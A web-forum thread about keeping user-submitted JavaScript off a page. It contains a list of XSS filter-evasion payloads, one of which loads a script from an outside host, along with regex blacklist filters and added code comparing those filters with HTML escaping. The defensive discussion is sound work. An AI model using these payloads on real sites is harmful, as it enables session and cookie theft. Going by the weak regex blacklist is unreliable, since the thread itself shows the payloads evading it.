#1 SitePoint Addict (nyc)

    javascript function to disable inline javascript?

    Is it possible to use a javascript function in the head of a document, that will "disable" or "kill" any javascript that resides in the body of that document?

    My situation:
    I will let users write their own code. Then the code will be included in the body of a document.
    So for security reasons, I don't want any javascript that the users might write, maliciously or not, to be potentially risky or annoying.
    Rather than try to delete any javascript from their posted code, I had this idea: write, in the head of the document that will include the code, a javascript function which will supersede any possible javascript in the body and somehow disable it.

    Possible?

#2 Mittineague (Programming Team)

    user javascript input

    I think you should do this (if at all) server-side. What's to prevent someone from copying the page, altering or removing the javascript and submitting it?

#3 SitePoint Guru
    Parse the user's code on the server before you save it to a file.

    The simplest way is to use a regular expression to replace any scripts with comments:

    replace /\<script([^\>]*)\>/gi with ' <!-- ' and
    /\< *\/ *script *\>/gi with ' -->';

    I'd also replace any /href *\= *(["'])javascript\:/gi with 'title= $1 '

    And you ought to prohibit any event attributes being set as
    anonymous functions;
    /(\<\w+[^\>]+)on(\w+) *\=/gi with '$1title='

    I'm sure you see where this is going... but suit yourself, there are plenty of sites on the internet, some of them are bound to be in bad neighborhoods.

#4 Mittineague (Programming Team)

    parse clean

    Actually, I was thinking more along the lines of wrapping the input in pre or code tags. Using a regex to filter is problematic, especially if you are using cookies or sessions. XSS can be written to send info to a harvester file.
    Code:
    ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
    Code:
    '';!--"<XSS>=&{()}
    Code:
    <IMG SRC="javascript:alert('XSS');">
    Code:
    <IMG SRC=javascript:alert('XSS')>
    Code:
    <IMG SRC=JaVaScRiPt:alert('XSS')>
    Code:
    <IMG SRC=javascript:alert(&quot;XSS&quot;)>
    Code:
    <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
    Code:
    <!--#exec cmd="/bin/echo '<SCRIPT
    SRC'"--><!--#exec cmd="/bin/echo
    '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
    Code:
    <XSS STYLE="xss:expression(alert('XSS'))">
    Code:
    <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
    Code:
    <DIV STYLE="background-image: url(javascript:alert('XSS'))">
    Code:
    <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
    etc etc etc. For the much longer XSS Cheat Sheet with even more examples of filter evasion: http://ha.ckers.org/xss.html
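The two approaches in posts #3 and #4 side by side, as an added example that is not code from either poster: the regex blacklist from #3 (with its regex syntax corrected) is run over a few of the vectors quoted in #4, next to plain HTML escaping, which is what "wrapping the input in pre or code tags" amounts to once the input itself is encoded. The sample vector list, the `containsMarkup` heuristic and the function names are assumptions made for this example.

```javascript
// Added example (not from the thread). Compares the regex blacklist from
// post #3 with output encoding over some of the vectors quoted in post #4.

// Post #3's filter, with the regex syntax corrected. Replacement strings
// follow the post: script tags become comment markers, javascript: hrefs
// and on*= handlers are renamed to title=.
function blacklistFilter(html) {
  return html
    .replace(/<script([^>]*)>/gi, ' <!-- ')
    .replace(/< *\/ *script *>/gi, ' --> ')
    .replace(/href *= *(["'])javascript:/gi, 'title= $1 ')
    .replace(/(<\w+[^>]+)on(\w+) *=/gi, '$1title=');
}

// Output encoding: every character the HTML parser treats specially becomes
// an entity, so the browser renders the whole input as literal text.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed sample inputs, taken from the vectors quoted in post #4.
const VECTORS = [
  `<IMG SRC="javascript:alert('XSS');">`,
  `<IMG SRC=JaVaScRiPt:alert('XSS')>`,
  `<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')>`,
  `<DIV STYLE="background-image: url(javascript:alert('XSS'))">`,
  `<XSS STYLE="xss:expression(alert('XSS'))">`,
  `<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`,
];

// Heuristic (assumption): an unescaped '<' followed by a letter means the
// browser will still parse an element out of the output, i.e. the user's
// markup survived. Comment markers like '<!--' do not count.
function containsMarkup(s) {
  return /<[a-z]/i.test(s);
}

// For each vector, report whether each approach left parseable markup behind.
function compare(vectors = VECTORS) {
  return vectors.map((input) => ({
    input,
    blacklistLeavesMarkup: containsMarkup(blacklistFilter(input)),
    escapedLeavesMarkup: containsMarkup(escapeHtml(input)),
  }));
}

for (const row of compare()) console.log(row);
```

The blacklist only knows about `<script>`, `href="javascript:` and `on*=`, so every vector in the list (IMG with a `javascript:` SRC, entity-encoded SRC, CSS `expression`, a tag with a bogus name) passes through with its markup intact, while the escaped version never contains a live tag. That is the practical reason behind #4's objection: a filter has to enumerate every evasion, whereas encoding the output has to get one thing right.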